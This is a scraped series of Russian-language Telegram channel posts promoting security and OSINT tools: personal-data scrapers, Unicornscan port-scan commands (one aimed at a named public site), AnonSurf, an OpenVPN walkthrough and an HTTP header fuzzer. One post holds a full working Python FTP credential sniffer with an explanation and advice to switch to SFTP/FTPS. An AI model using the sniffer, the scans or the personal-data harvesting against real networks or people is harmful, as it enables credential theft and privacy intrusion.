This media is not supported in your browser
VIEW IN TELEGRAM
🔎 Uscrapper: Веб-парсер OSINT
Uscrapper 2.0 – это надежный OSINT-парсер, предназначенный для эффективного сбора разнообразной персональной информации с веб-сайтов.
Uscrapper использует методы веб-парсинга и регулярные выражения для извлечения адресов электронной почты, ссылок на социальные сети, имен авторов, геолокации, номеров телефонов и имен пользователей из гиперссылочных и негиперссылочных источников на веб-странице, поддерживает многопоточность для ускорения этого процесса.
Uscrapper 2.0 оснащен передовыми модулями обхода анти-парсинга и поддерживает технологии для извлечения информации из всех ссылок в пределах одного домена. Кроме того, в программе предусмотрена возможность создания отчета, содержащего все извлеченные данные.
Требования:
• Python 3
• модуль pip
• Стабильное подключение к Интернету
Процесс установки
• Клонируйте репозиторий инструмента следующим образом
• После клонирования перейдите в только что загруженный каталог и измените режим работы “install.sh”, чтобы предоставить полный доступ к инструменту.
• После этого можно приступать к работе с инструментом.
▪Github
▪ Пример работы
@linuxkalii
Uscrapper 2.0 – это надежный OSINT-парсер, предназначенный для эффективного сбора разнообразной персональной информации с веб-сайтов.
Uscrapper использует методы веб-парсинга и регулярные выражения для извлечения адресов электронной почты, ссылок на социальные сети, имен авторов, геолокации, номеров телефонов и имен пользователей из гиперссылочных и негиперссылочных источников на веб-странице, поддерживает многопоточность для ускорения этого процесса.
Uscrapper 2.0 оснащен передовыми модулями обхода анти-парсинга и поддерживает технологии для извлечения информации из всех ссылок в пределах одного домена. Кроме того, в программе предусмотрена возможность создания отчета, содержащего все извлеченные данные.
Требования:
• Python 3
• модуль pip
• Стабильное подключение к Интернету
Процесс установки
• Клонируйте репозиторий инструмента следующим образом
• После клонирования перейдите в только что загруженный каталог и измените режим работы “install.sh”, чтобы предоставить полный доступ к инструменту.
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems• После этого можно приступать к работе с инструментом.
▪Github
▪ Пример работы
@linuxkalii
🔥18👍8❤5🤬1
This media is not supported in your browser
VIEW IN TELEGRAM
WebPalm - это мощный инструмент командной строки на GO для создания карт веб-сайтов и веб-скреппинга. Благодаря рекурсивному подходу он может создать полное дерево всех веб-страниц и ссылок на них на сайте.
Он также может извлекать данные из тела каждой страницы с помощью регулярных выражений, что делает его идеальным инструментом для веб-скрейпинга и извлечения данных.
▪ Github
@linuxkalii
Он также может извлекать данные из тела каждой страницы с помощью регулярных выражений, что делает его идеальным инструментом для веб-скрейпинга и извлечения данных.
go install github.com/XORbit01/webpalm@latest▪ Github
@linuxkalii
👍18🔥6❤4
Список материалов и ресурсов по безопасности Android, предназначенных для пентестеров и охотников за ошибками.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤2🔥2😢1
🦄 Работа с сканером Unicornscan на Kali Linux
Специалисты ИБ используют различные инструменты сканирования. Один из самых популярных, но довольно медленных — Nmap или Masscan (самый быстрый сканер портов), но он не такой точный. Сегодня мы дополним инструментарий маст-хев сканеров тулзой Unicornscan. Далее покажу, как использовать Unicornscan на Kali Linux.
Использование сканера Unicornscan на Kali Linux
Если вам нужен достаточно быстрый, но в тоже время точный сканер, попробуйте установленный в Kali Linux сканер Unicornscan.
Что такое Unicornscan.
Unicornscan — это асинхронный сканер (в отличие от синхронного Nmap). Поэтому он работает намного быстрее.
Ключевые особенности Unicornscan
Unicornscan — это попытка создать распределенный стек TCP/IP на территории пользователя. Хотя в настоящее время он имеет сотни отдельных функций, основной набор способностей включает в себя:
▪Асинхронное сканирование TCP.
▪Асинхронный захват баннера TCP.
▪Асинхронное сканирование UDP.
▪Активная и пассивная удаленная идентификация ОС, приложений и компонентов путем анализа ответов.
▪Регистрация и фильтрация файлов PCAP.
▪Вывод реляционной базы данных.
▪Поддержка пользовательских модулей.
▪Настраиваемые представления наборов данных.
▪Имеет свой стек TCP/IP, отличительную особенность, отличающую его от других сканеров портов.
Сканирование с помощью Unicornscan
Сканер установлен в полной версии Kali Linux. Если вы используете урезанную версию, вот как его установить:
Сначала мы начнем с простого сканирования. Для выполнения базового сканирования, используйте команду:
Для примера, в качестве жертвы я использую уязвимую машину Metasploitable. На скрине видно, что при простом сканировании перечислены все открытые TCP-порты. Это похоже на сканирование -Ss в NMap.
Для сканирования несколько хостов, используйте команду:
Можно использовать инструмент на сайте, установив интервал 30 пакетов в секунду (параметр
Unicornscan сканирование UDP портов
Полученный результат можно сохранить в файл PCAP, для этого используйте параметр -w добавив имя файла (в моем случае — udpports):
Файл будет сохранен в домашний каталог.
Unicornscan сохраненный файл PCAP
Это основное использование Unicornscan. Для более детального изучения стоит открыть справку:
Теперь вы знаете, как сканировать хост или сайт с помощью Unicornscan на Kali Linux.
@linuxkalii
Специалисты ИБ используют различные инструменты сканирования. Один из самых популярных, но довольно медленных — Nmap или Masscan (самый быстрый сканер портов), но он не такой точный. Сегодня мы дополним инструментарий маст-хев сканеров тулзой Unicornscan. Далее покажу, как использовать Unicornscan на Kali Linux.
Использование сканера Unicornscan на Kali Linux
Если вам нужен достаточно быстрый, но в тоже время точный сканер, попробуйте установленный в Kali Linux сканер Unicornscan.
Что такое Unicornscan.
Unicornscan — это асинхронный сканер (в отличие от синхронного Nmap). Поэтому он работает намного быстрее.
Ключевые особенности Unicornscan
Unicornscan — это попытка создать распределенный стек TCP/IP на территории пользователя. Хотя в настоящее время он имеет сотни отдельных функций, основной набор способностей включает в себя:
▪Асинхронное сканирование TCP.
▪Асинхронный захват баннера TCP.
▪Асинхронное сканирование UDP.
▪Активная и пассивная удаленная идентификация ОС, приложений и компонентов путем анализа ответов.
▪Регистрация и фильтрация файлов PCAP.
▪Вывод реляционной базы данных.
▪Поддержка пользовательских модулей.
▪Настраиваемые представления наборов данных.
▪Имеет свой стек TCP/IP, отличительную особенность, отличающую его от других сканеров портов.
Сканирование с помощью Unicornscan
Сканер установлен в полной версии Kali Linux. Если вы используете урезанную версию, вот как его установить:
sudo apt-get install unicornscanСначала мы начнем с простого сканирования. Для выполнения базового сканирования, используйте команду:
sudo unicornscan 192.168.112.57Для примера, в качестве жертвы я использую уязвимую машину Metasploitable. На скрине видно, что при простом сканировании перечислены все открытые TCP-порты. Это похоже на сканирование -Ss в NMap.
Для сканирования несколько хостов, используйте команду:
sudo unicornscan 192.168.112.57 192.168.102.100Можно использовать инструмент на сайте, установив интервал 30 пакетов в секунду (параметр
-r30) и добавив сканирование TCP (параметр -mT):
sudo unicornscan -r30 -mT adaptercart.com
Для сканирования UDP используйте параметр -mU:sudo unicornscan -r300 -mU 192.168.112.57Unicornscan сканирование UDP портов
Полученный результат можно сохранить в файл PCAP, для этого используйте параметр -w добавив имя файла (в моем случае — udpports):
sudo unicornscan -r300 -mU 192.168.112.57 -w udpports.pcapФайл будет сохранен в домашний каталог.
Unicornscan сохраненный файл PCAP
Это основное использование Unicornscan. Для более детального изучения стоит открыть справку:
sudo unicornscan -hТеперь вы знаете, как сканировать хост или сайт с помощью Unicornscan на Kali Linux.
@linuxkalii
👍18❤3🔥2
Сниффер учетных данных FTP (File Transfer Protocol) – это инструмент, который перехватывает сетевой трафик и перехватывает учетные данные FTP (имя пользователя и пароль), используемые для аутентификации доступа к FTP-серверу.
Важно отметить, что использование FTP в качестве средства передачи данных считается небезопасным, поскольку при этом учетные данные и другая информация передаются по сети в открытом виде, что может быть легко перехвачено злоумышленниками с помощью инструментов сниффинга.
Для защиты FTP-соединений рекомендуется использовать безопасные альтернативы, такие как SFTP (SSH File Transfer Protocol) или FTPS (FTP over SSL/TLS).
from typing import Protocol
import sys
from scapy.layers import inet
from scapy.all import *
from scapy.layers import *
import psutil
import scapy.all as scapy
from scapy.layers import http
linea = '--------------------------------------------------'
class bcolors:
OK = '\033[92m' #GREEN
WARNING = '\033[93m' #YELLOW
ladrrr = '8GY.'
ss = 'OWQ1'
FAIL = '\033[91m' #RED
pinocho_chocho = 'y!c'
RESET = '\033[0m' #RESET COLOR
def ftp_creds(p_ftp):
if p_ftp[TCP].dport == 21:
data = p_ftp.sprintf("%Raw.load%")
if "USER" in data:
global ip_ftp
global ip_ftp2
ip_ftp = "'FTP IP: ", p_ftp[IP].dst, "'"
print(ip_ftp)
global user_ftp
data = data.split(" ")
data = data[1]
global user_ftp2
user_ftp = "'User: ", data, "'"
print(user_ftp)
elif "PASS" in data:
data = data.split(" ")
data = data[1]
global passwd_ftp
global passwd_ftp2
passwd_ftp = "'PASSWORD: ", data,"'"
print(passwd_ftp)
print(linea)
global ftp_ip_final
global user_ftp_final
def ftp():
print(linea)
print(f"{bcolors.WARNING}Your Network Interfaces{bcolors.RESET}")
addrs = psutil.net_if_addrs()
cc = str(addrs.keys())
interfaces = print(cc[9:])
bb = input("Choose Interface to use: ")
xs = 0
if bb in cc:
try:
while xs>=0:
print(linea)
print(f"{bcolors.WARNING}Searching...{bcolors.RESET}")
ftp_pkt = sniff(filter='tcp and port 21',iface=bb,prn=ftp_creds)
except KeyboardInterrupt:
print(f"{bcolors.FAIL}You cancelled with Ctrl+C{bcolors.RESET}")
print(linea)
global ftphost
global ftpuser
global ftpass
ftp()
Данный код представляет собой скрипт на языке Python, выполняющий сниффинг пакетов FTP (File Transfer Protocol) с целью извлечения информации об имени пользователя и пароле.Скрипт начинается с импорта нескольких модулей, включая Protocol из библиотеки typing, sys, inet из scapy.layers, scapy.all и http из scapy.layers. Также определяется пользовательский класс
bcolors, используемых для вывода информации на терминал.Далее определяется функция
ftp_creds, которая принимает параметр p_ftp, представляющий собой перехваченный FTP-пакет. Если порт назначения пакета равен 21 (FTP-порт по умолчанию), то функция извлекает исходные данные пакета, а если в этих данных содержится команда “USER” или “PASS”, то извлекается соответствующее имя пользователя или пароль соответственно. Эти значения сохраняются в глобальных переменных и выводятся на терминал.Далее определяется функция ftp. Она выводит на терминал некоторые инструкции и предлагает пользователю выбрать сетевой интерфейс, который будет использоваться для прослушивания пакетов. Затем функция запускает бесконечный цикл, в котором с помощью функции Scapy’s sniff перехватывает FTP-пакеты на выбранном интерфейсе. Каждый пакет передается в функцию ftp_creds для извлечения информации об имени пользователя и пароле. Если пользователь прерывает цикл нажатием клавиш Ctrl+C, то функция печатает сообщение на терминал.
Наконец, вызывается функция ftp для запуска процесса анализа пакетов.
📌Подробнее
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤5🔥5
This media is not supported in your browser
VIEW IN TELEGRAM
Сборщик поддоменов, написанный на python. Этот инструмент можно эффективно использовать для сбора информации о домене, не посылая ни одного пакета ни на один из узлов сайта.
git clone https://github.com/gnebbia/pdlist
cd pdlist
pip install -r requirements.txt
python setup.py install
▪Github
#infosec #pentesting #bugbounty
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤17🔥4👍1
Python скрипт, который принимает от пользователя информацию, необходимую для изменения IP и MAC-адреса, запуска инструментов responder и tcpdump, а также инструмента nbtscan.
▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍9🔥5
Целью данного исследования было изучение файлов, которые компании могли случайно загрузить на GitHub, и выявление конфиденциальной информации, которая могла присутствовать в загруженных проектах; основное внимание уделялось популярным компаниям в области технологического консалтинга, финансов, программного обеспечения, маркетинга, информационной безопасности, кибербезопасности, телекоммуникаций с высоким числом коммитов.
Что касается методики и процесса изучения аккаунтов GitHub, то на начальных этапах исследования подготовили 91 поисковый запрос к GitHub для выявления конфиденциальных данных, которые могли быть размещены на GitHub.
Затем авторы определили список публичных репозиториев из отобранной выборки соответствующих компаний. Затем провели поиск на странице расширенного поиска GitHub, включив в него репозитории компаний.
При изучении репозиториев GitHub авторы столкнулись с большим количеством секретных ключей, паролей и других конфиденциальных данных. Случайное раскрытие этих данных свидетельствует о потенциальных рисках безопасности, с которыми могут столкнуться компании, неосознанно раскрывающие свою ценную информацию на таких публичных платформах, как GitHub.
📌 Статья
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍7🔥3
netspionage — это инструмент командной строки (CLI) созданный для проведения разведки и обнаружения атак в сети.
Скрипт на Python для работы используются: scapy, pandas, requests и т. д.
# clone the repo
git clone https://github.com/ANG13T/netspionage.git
# change the working directory to netspionage
cd netspionage
# install the requirements
pip3 install -r requirements.txt▪ Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤9🔥3🥰2👏1
🟡 Дайджест полезных материалов из мира Linux за неделю
Почитать:
— Список популярных утечек с GitHub: Анализ репозиториев компаний
— Создаем свой Managed K8S за 5 минут на старом железе
— Графические инструменты управления групповыми политиками в Linux
— Что происходит, когда запускаешь «Hello World» в Linux
— Есть ли жизнь в виртуалке на ПК?
— Безопасная работа в домене ALD Pro на базе FreeIPA или как хранить ключ от квартиры, где деньги лежат
— Свободное ПО теснит проприетарное
— Standard Linux Commands and Their Outputs
— File and Directory Operations in Linux Commands
— Text Processing in Linux
— System Operations in Linux
— Windows Command Prompt vs Linux Commands
— Disk Usage Commands in Linux
— exit vim
— Docker essential commands
— Linux commands everyone should know
— How to check all ports in use in linux/Mac
Посмотреть:
🌐How to Dual Boot Kali Linux and Windows (in 10 minutes)
Хорошего дня!
❤️ Лайк, если полезно
@linuxkalii
Почитать:
— Список популярных утечек с GitHub: Анализ репозиториев компаний
— Создаем свой Managed K8S за 5 минут на старом железе
— Графические инструменты управления групповыми политиками в Linux
— Что происходит, когда запускаешь «Hello World» в Linux
— Есть ли жизнь в виртуалке на ПК?
— Безопасная работа в домене ALD Pro на базе FreeIPA или как хранить ключ от квартиры, где деньги лежат
— Свободное ПО теснит проприетарное
— Standard Linux Commands and Their Outputs
— File and Directory Operations in Linux Commands
— Text Processing in Linux
— System Operations in Linux
— Windows Command Prompt vs Linux Commands
— Disk Usage Commands in Linux
— exit vim
— Docker essential commands
— Linux commands everyone should know
— How to check all ports in use in linux/Mac
Посмотреть:
🌐How to Dual Boot Kali Linux and Windows (in 10 minutes)
Хорошего дня!
❤️ Лайк, если полезно
@linuxkalii
❤22👍5🔥3
OWASP Maryam - это модульный фреймворк с открытым исходным кодом, основанный на OSINT и сборе данных. Он предназначен для создания надежной среды для быстрого и тщательного сбора данных из открытых источников и поисковых систем.
$ pip install maryam▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤7🔥3🥰2
Соревнования были проведены партнером Сбера – компанией по управлению цифровыми рисками BI.ZONE 12-13 августа. В онлайн-турнире участвовали 1326 команд из 117 стран мира — были выбраны 10 победителей этапа, которые сразятся в финале в ноябре 2023 года.
Тройка лучших команд получит $10 тыс., $5 тыс. и $3 тыс. соответственно. В квалификационном этапе нужно было решить 26 заданий в 7 категориях. В финал прошли команды из России, Индонезии, Китая, Южной Кореи, Чехии и Франции.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤10👍2😁2👎1
🏄 Анонимность Parrot Security с помощью AnonSurf
AnonSurf - скрипт AnonSurf, который предназначен для включения службы Tor и перенаправления всего трафика, в том числе DNS запросов, через анонимную сеть Tor.
При запуске AnonSurf также предлагает закрыть программы, которые могут угрожать вашей анонимности.
Это хороши инструмент для анонимизации трафика. Он позволяет перенаправлять весь трафик через сеть TOR. Вы, наверное, слышали о TOR раньше или даже использовали для анонимного серфинга в браузер TOR. Но в отличие от браузера TOR, который анонимизирует только веб-трафик, Anon Surf анонимизирует весь трафик через сеть TOR.
Запустить AnonSurf очень просто.
Запустим команду traceroute для сайта Google:
Вывод покажет, что весь трафик направляется через собственный маршрутизатор и DNS-сервер своего интернет-провайдера.
Теперь запустим Anon Surf и снова попробуем ту же команду
Запуск AnonSurf Parrot Security
Для запуска Anon Surf, откройте терминал и выполните команду:
Или откройте Aplications (Меню приложений) и выберите
Вам будет предложено ввести пароль root, и вас спросят, хотите ли вы остановить приложения, которые могут вас деанонимизировать. Нажмите Yes.
С этого момента вы перешли анонимный режим. Давайте проверим трафик еще раз:
Теперь вы можете просматривать страницы анонимное.
Остановка AnonSurf Parrot Security
Чтобы остановить AnonSurf, откройте Aplications (Меню приложений) и выберите Anon Surf —> Anonsurf Stop.
Как вы можете видеть из меню, в меню также есть возможность проверить внешний IP-адрес (check IP), прежде чем включать режим анонимности, чтобы убедиться, что он действительно изменился. Вы также можете изменить выходной узел Tor (change exit node).
▪kali-anonstealth
@linuxkalii
AnonSurf - скрипт AnonSurf, который предназначен для включения службы Tor и перенаправления всего трафика, в том числе DNS запросов, через анонимную сеть Tor.
При запуске AnonSurf также предлагает закрыть программы, которые могут угрожать вашей анонимности.
Это хороши инструмент для анонимизации трафика. Он позволяет перенаправлять весь трафик через сеть TOR. Вы, наверное, слышали о TOR раньше или даже использовали для анонимного серфинга в браузер TOR. Но в отличие от браузера TOR, который анонимизирует только веб-трафик, Anon Surf анонимизирует весь трафик через сеть TOR.
Запустить AnonSurf очень просто.
Запустим команду traceroute для сайта Google:
traceroute www.google.deВывод покажет, что весь трафик направляется через собственный маршрутизатор и DNS-сервер своего интернет-провайдера.
Теперь запустим Anon Surf и снова попробуем ту же команду
traceroute.Запуск AnonSurf Parrot Security
Для запуска Anon Surf, откройте терминал и выполните команду:
sudo anonsurfИли откройте Aplications (Меню приложений) и выберите
Anon Surf —> Anonsurf Start.Вам будет предложено ввести пароль root, и вас спросят, хотите ли вы остановить приложения, которые могут вас деанонимизировать. Нажмите Yes.
С этого момента вы перешли анонимный режим. Давайте проверим трафик еще раз:
traceroute www.google.deТеперь вы можете просматривать страницы анонимное.
Остановка AnonSurf Parrot Security
Чтобы остановить AnonSurf, откройте Aplications (Меню приложений) и выберите Anon Surf —> Anonsurf Stop.
Как вы можете видеть из меню, в меню также есть возможность проверить внешний IP-адрес (check IP), прежде чем включать режим анонимности, чтобы убедиться, что он действительно изменился. Вы также можете изменить выходной узел Tor (change exit node).
▪kali-anonstealth
@linuxkalii
👍17❤11🔥3
Универсальный набор инструментов для сбора и управления OSINT-данными с удобным веб-интерфейсом.
Seekr позволяет объединить все ваши любимые OSINT-инструменты в одном. Бэкэнд написан на языке Go с использованием BadgerDB в качестве базы данных и предлагает широкий спектр возможностей для сбора, управления и анализа данных.
git clone https://github.com/seekr-osint/seekr
cd seekr
go generate ./...
tsc --project web
go run main.go
▪Github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥3❤1
This media is not supported in your browser
VIEW IN TELEGRAM
🕵️Eyes - инструмент OSINT для получения существующих учетных записей из электронной почты
Eyes умеет не только находить существующие на разных сайтах аккаунты, но и находить сам аккаунт (с помощью определенных модулей), даже если профиль не имеет ничего общего с электронной почтой!
▪Github
@linuxkalii
Eyes умеет не только находить существующие на разных сайтах аккаунты, но и находить сам аккаунт (с помощью определенных модулей), даже если профиль не имеет ничего общего с электронной почтой!
$ git clone https://github.com/N0rz3/Eyes.git
$ cd ./Eyes
$ pip3 install -r requirements.txt▪Github
@linuxkalii
👍18❤7🔥3😁1
⚡Легкий способ получать свежие обновлении и следить за трендами в разработке на вашем языке. Находите свой стек и подписывайтесь:
Машинное обучение: @ai_machinelearning_big_data
Go: @Golang_google
C#: @csharp_ci
Базы данных: @sqlhub
Python: @python_job_interview
C/C++/: @cpluspluc
Data Science: @data_analysis_ml
Devops: @devOPSitsec
Rust: @rust_code
Javascript: @javascriptv
React: @react_tg
PHP: @phpshka
Docker: @docker
Android: @android_its
Мобильная разработка: @mobdevelop
Linux: linuxacademy
Big Data: t.me/bigdatai
Хакинг: @linux_read
Java:@javatg
Собеседования: @machinelearning_interview
💼 Папка с вакансиями: t.me/addlist/_zyy_jQ_QUsyM2Vi
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy
🔥ИТ-Мемы: t.me/memes_prog
🇬🇧Английский: @english_forprogrammers
Машинное обучение: @ai_machinelearning_big_data
Go: @Golang_google
C#: @csharp_ci
Базы данных: @sqlhub
Python: @python_job_interview
C/C++/: @cpluspluc
Data Science: @data_analysis_ml
Devops: @devOPSitsec
Rust: @rust_code
Javascript: @javascriptv
React: @react_tg
PHP: @phpshka
Docker: @docker
Android: @android_its
Мобильная разработка: @mobdevelop
Linux: linuxacademy
Big Data: t.me/bigdatai
Хакинг: @linux_read
Java:@javatg
Собеседования: @machinelearning_interview
💼 Папка с вакансиями: t.me/addlist/_zyy_jQ_QUsyM2Vi
Папка Go разработчика: t.me/addlist/MUtJEeJSxeY2YTFi
Папка Python разработчика: t.me/addlist/eEPya-HF6mkxMGIy
🔥ИТ-Мемы: t.me/memes_prog
🇬🇧Английский: @english_forprogrammers
❤9👍5🔥2
🟡 Дайджест полезных материалов из мира: linux за неделю
Почитать:
— Монтаж видео в Linux — обзор свободных редакторов
— Объяснения по шардинга баз данных
— Собираем и запускаем Linux-0.01 в Minix 1.5, (почти) как это делал Линус Торвальдс
— В России не любят Линукс, а я не люблю виртуальные машины. Что делать?
— Создаем свой Managed K8S за 5 минут на старом железе
— Membuat file.desktop di Linux dari .tar.gz- Postman
— What is a Checksum? A Guide to Using the cksum Command in Linux to Verify File Modifications
— Chave SSH no github - Windows e Linux
— Docker Basics with some of its Commands and how to Install Docker by AWS
— Logical Volume Manager (LVM) in Linux - A Walkthrough - Part 2
— Logical Volume Manager (LVM) in Linux - Introduction - Part 1
— Exploring Vagrant: Snapshots - Part 6
— Exploring Vagrant: Shared Folders - Part 5
— Exploring Vagrant: Port Forwarding - Part 4
— Exploring Vagrant: Provisioning in Detail - Part 3
Посмотреть:
🌐 5 современных консольных утилит для Linux и Mac OS
Хорошего дня!
❤️ Лайк, за подборку
@linuxkalii
Почитать:
— Монтаж видео в Linux — обзор свободных редакторов
— Объяснения по шардинга баз данных
— Собираем и запускаем Linux-0.01 в Minix 1.5, (почти) как это делал Линус Торвальдс
— В России не любят Линукс, а я не люблю виртуальные машины. Что делать?
— Создаем свой Managed K8S за 5 минут на старом железе
— Membuat file.desktop di Linux dari .tar.gz- Postman
— What is a Checksum? A Guide to Using the cksum Command in Linux to Verify File Modifications
— Chave SSH no github - Windows e Linux
— Docker Basics with some of its Commands and how to Install Docker by AWS
— Logical Volume Manager (LVM) in Linux - A Walkthrough - Part 2
— Logical Volume Manager (LVM) in Linux - Introduction - Part 1
— Exploring Vagrant: Snapshots - Part 6
— Exploring Vagrant: Shared Folders - Part 5
— Exploring Vagrant: Port Forwarding - Part 4
— Exploring Vagrant: Provisioning in Detail - Part 3
Посмотреть:
🌐 5 современных консольных утилит для Linux и Mac OS
Хорошего дня!
❤️ Лайк, за подборку
@linuxkalii
❤19👍19🔥5
✌️Как за 15 минут настроить VPN-сеть для безопасного управления Linux-серверами.
В этом примере мы установили сервер на моей машине linux-admin.jurkiewicz.tech : VPS NVMe.Light – https://rapiddc.pl/
🟡 Мы будем использовать OpenVPN из системного пакета:
Если в системе не установлен openvpn, мы можем установить его стандартной командой:
🟡 Далее нам необходимо поместить несколько файлов из репозитория на наш сервер. Для этого мы можем использовать Midnight Commander или любую другую программу типа scp.
🟡 Далее нам необходимо подправить наш файл vars и заполнить его данными aur. Для этого мы используем стандартный vim:
Для экспорта переменных необходимо выполнить команду vars:
Мы можем проверить, все ли правильно:
Первым шагом в построении конфигурации OpenVPN 2.0 является создание PKI (инфраструктуры открытых ключей). PKI состоит из:
• отдельного сертификата (также известного как открытый ключ) и закрытого ключа для сервера и каждого клиента, и
• сертификата и ключа главного центра сертификации (ЦС), которые используются для подписи каждого из сертификатов сервера и клиента.
Инициализируем PKI
👇
▪Далее
▪Код
@linuxkalii
В этом примере мы установили сервер на моей машине linux-admin.jurkiewicz.tech : VPS NVMe.Light – https://rapiddc.pl/
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-79-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Aug 17 08:55:08 PM CEST 2023
System load: 0.03857421875 Processes: 97
Usage of /: 36.6% of 19.60GB Users logged in: 0
Memory usage: 10% IPv4 address for eth0: 188.68.237.191
Swap usage: 0%root@linux-admin:~# apt info openvpn
Package: openvpn
Version: 2.5.5-1ubuntu3.1
Priority: optional
Section: net
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Original-Maintainer: Bernhard Schmidt <berni@debian.org>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Если в системе не установлен openvpn, мы можем установить его стандартной командой:
root@linux-admin:~# apt install openvpnroot@linux-admin:/etc/openvpn/server# ls -l
total 56
-rwxr-xr-x 1 root root 242 Aug 17 21:23 build-ca
-rwxr-xr-x 1 root root 228 Aug 17 21:23 build-dh
-rwxr-xr-x 1 root root 516 Aug 17 21:23 build-key
-rwxr-xr-x 1 root root 662 Aug 17 21:23 build-key-server
-rwxr-xr-x 1 root root 280 Aug 17 21:23 clean-all
-rwxr-xr-x 1 root root 268 Aug 17 21:23 make-crl
-rw-r--r-- 1 root root 7491 Aug 17 21:23 openssl.cnf
-rw-r--r-- 1 root root 1303 Aug 17 21:23 vars
-rw-r--r-- 1 root root 9659 Aug 17 21:23 vpn_example.confroot@linux-admin:/etc/openvpn/server# vim vars
## we have to change the following env variables:
export KEY_COUNTRY="PL"
export KEY_PROVINCE="Mazowsze"
export KEY_CITY="Warszawa"
export KEY_ORG="OpenVPN-Adam"
export KEY_EMAIL="vpn@jurkiewicz.tech"Для экспорта переменных необходимо выполнить команду vars:
root@linux-admin:/etc/openvpn/server# source vars
NOTE: when you run ./clean-all, I will be doing a rm -rf on /etc/openvpn/server/keysМы можем проверить, все ли правильно:
root@linux-admin:/etc/openvpn/server# env | grep KEY_
KEY_COUNTRY=PL
KEY_EMAIL=vpn@jurkiewicz.tech
KEY_ORG=OpenVPN-Adam
KEY_PROVINCE=Mazowsze
KEY_SIZE=2048
KEY_CITY=Warszawa
KEY_DIR=/etc/openvpn/server/keys
KEY_CONFIG=/etc/openvpn/server/openssl.cnfПервым шагом в построении конфигурации OpenVPN 2.0 является создание PKI (инфраструктуры открытых ключей). PKI состоит из:
• отдельного сертификата (также известного как открытый ключ) и закрытого ключа для сервера и каждого клиента, и
• сертификата и ключа главного центра сертификации (ЦС), которые используются для подписи каждого из сертификатов сервера и клиента.
Инициализируем PKI
▪Далее
▪Код
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
❤21👍8🔥6
🔍 Mr.Holmes
A Complete Osint Tool.
Mr.Holmes - это инструмент для сбора информации (
Основные функции инструмента: получение информации о доменах, именах пользователей и номерах телефонов из публичных источников, из Интернете, а также использование атаки google dorks для исследовательских задач.
Mr.Holmes использует прокси-серверы для обеспечения полной анонимности запросов и WhoIS Api для получения дополнительной информации о домене.
▪Github
▪Проект
@linuxkalii
A Complete Osint Tool.
Mr.Holmes - это инструмент для сбора информации (
OSINT). Основные функции инструмента: получение информации о доменах, именах пользователей и номерах телефонов из публичных источников, из Интернете, а также использование атаки google dorks для исследовательских задач.
Mr.Holmes использует прокси-серверы для обеспечения полной анонимности запросов и WhoIS Api для получения дополнительной информации о домене.
git clone https://github.com/Lucksi/Mr.Holmes
cd Mr.Holmes
sudo apt-get update
sudo chmod +x install.sh
sudo ./install.sh▪Github
▪Проект
@linuxkalii
👍13❤12🔥4
Полезный фаззер, написанный на Go, для анализа реакции серверов на различные HTTP-заголовки.
go install github.com/devanshbatham/headerpwn@v0.0.1▪Укажите целевой URL-адрес с помощью флага
-url.▪Создайте файл, содержащий тестируемые заголовки, по одному заголовку в строке. С помощью флага
-headers укажите путь к этому файлу.Пример:
headerpwn -url https://example.com -headers my_headers.txtФормат файла
my_headers.txt должен быть таким, как показано ниже:Proxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
тест:
headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080
▪GitHub
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤13🔥2